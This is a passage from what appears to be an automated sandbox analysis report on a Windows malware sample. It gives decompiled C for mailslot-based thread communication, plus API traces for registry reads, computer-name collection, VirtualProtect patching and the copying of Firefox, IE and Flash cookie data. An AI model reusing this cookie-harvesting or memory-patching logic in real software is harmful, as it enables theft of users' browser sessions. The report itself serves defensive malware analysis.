				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001CD171, Relevance: 9.1, APIs: 6, Instructions: 67 Total matches: 31thread
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3D4D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 38registry
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF422, Relevance: 10.6, APIs: 7, Instructions: 85 Total matches: 37registrylibraryloader
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
